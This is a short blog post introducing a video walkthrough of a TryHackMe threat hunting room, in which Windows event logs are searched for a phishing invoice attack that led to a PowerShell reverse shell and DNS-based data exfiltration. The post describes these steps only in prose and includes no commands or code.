Threat Hunting Case Study | The Strange Invoice | TryHackMe Hunt Me 1: Payment Collectors
We covered a threat hunting challenge that involved hunting Windows event logs exported from a compromised machine due to recent phishing email.
The hunt started with finding the initial attachment that was downloaded using Outlook and later on extracted.
The extracted files contained a payment invoice in PDF that when opened spawned a powershell process that downloaded a reverse shell and connected to the attacker C2 server where further commands were launched to enumerate the system and finally to exfilterate data from a file server using Nslookup tool.
The scenario
On Friday, September 15, 2023, Michael Ascot, a Senior Finance Director from SwiftSpend, was checking his emails in Outlook and came across an email appearing to be from Abotech Waste Management regarding a monthly invoice for their services. Michael actioned this email and downloaded the attachment to his workstation without thinking.
The following week, Michael received another email from his contact at Abotech claiming they were recently hacked and to carefully review any attachments sent by their employees. However, the damage has already been done. Use the attached Elastic instance to hunt for malicious activity on Michael’s workstation and within the SwiftSpend domain!
Check out the video below for detailed explanation.
Room Answers | TryHackMe Hunt Me I: Payment Collectors
Room answers can be found here.
